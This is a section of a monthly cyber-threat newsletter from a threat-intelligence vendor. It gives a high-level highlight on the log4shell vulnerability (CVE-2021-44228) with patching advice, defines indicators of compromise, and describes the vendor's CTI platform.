Indicateurs de compromission (IOCs) identifiés
Rapports de compromission identifiés (regroupement d’IoCs)
HIGHLIGHT OF THE MONTH
We have chosen to dedicate this first highlight to the CVE-2021-44228 vulnerability, better known as log4shell.
Despite being only a small part (1.48% of our Top CVE), it is the first of a series of critical vulnerabilities affecting the log4j library. The danger posed by CVE-2021-44228 lies in its ability to allow an attacker to arbitrarily execute code remotely by submitting data to an application using the journalization of the vulnerable library.
The exploitation of this vulnerability has already been performed by many cybercriminal groups in order to propagate several malware and offensive tools such as Kinsing, Conti, Dridex or Cobalt Strike, as well as Mirai variants, …
LastInfoSec’s CTI analyst team has observed that the vulnerability is currently still being exploited in the wild. We therefore advise companies and organizations to continue without delay to deploy available patches and update the existing tools in place to detect this vulnerability.
In a nutshell, the rapid exploitation by many malicious actors of a vulnerability with this level of risk and the potentially strong impact it can have on all users is a useful reminder at the beginning of this year of the importance of maintaining an active monitoring policy of emerging threats and reinforcing the patching strategies in place.
DEFINITION OF THE MONTH
An Indicator Of Compromise (IOC) is a set of characteristics, or artifacts, representative of known malicious behavior. The use of IoCs allows to detect if an attack has taken place, to identify the tools used and the specific patterns used by certain attackers.
IoCs allow the organization affected by the compromise to detect it promptly in order to implement the appropriate incident response actions. A malicious file condensate, a phishing site’s URL or a Command & Control server domain are a few examples of possible IoC sources.
ABOUT THE CYBER THREATS BAROMETER
rnrnMalware, zero-day vulnerabilities, advanced persistent threats, industries and sectors particularly targeted, weak signals of emerging attacks…It’s no secret that knowledge of one’s adversary is a key factor for the security of an enterprise. The Cyber Threats Barometer gives you a monthly overview of the cyber threats detected in the previous month by Gatewatcher CTI , our Cyber Threat Intelligence platform.rnrnGatewatcher CTI’s automated collection, analysis and correlation engines are continuously fed by more than three thousand data sources from multiple channels: social networks, specialized sites, dark and deep web. They make threat information available an average of 24 hours in advance of the competition and help operational response teams make better decisions by dramatically reducing their analysis and incident treatment times.